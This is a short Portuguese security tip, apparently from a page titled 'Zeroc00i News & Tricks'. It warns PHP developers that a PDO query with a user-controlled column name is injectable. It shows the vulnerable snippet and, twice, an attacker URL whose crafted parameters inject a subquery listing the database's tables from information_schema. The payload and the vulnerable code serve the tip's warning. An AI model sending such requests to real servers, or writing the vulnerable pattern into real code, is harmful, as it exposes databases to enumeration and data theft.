Passo 1: O AtacanteO atacante envia a seguinte requisição para o servidor:.../script.php?col=\?%23%00&name='x' FROM (SELECT table_name AS 'x' from information_schema.tables)y;%23

Zeroc00i News & Tricks

Você usa um código PDO parecido com este? $col = $_GET['col']; // A variável é controlada pelo usuário $stmt = $pdo->prepare("SELECT `$col` FROM fruit WHERE name = ?"); $stmt->execute([$_GET['name']]); Caso sim, considere desabilitar a funcionalidade de…

Passo 1: O Atacante
O atacante envia a seguinte requisição para o servidor:

.../script.php?col=\?%23%00&name='x' FROM (SELECT table_name AS 'x' from information_schema.tables)y;%23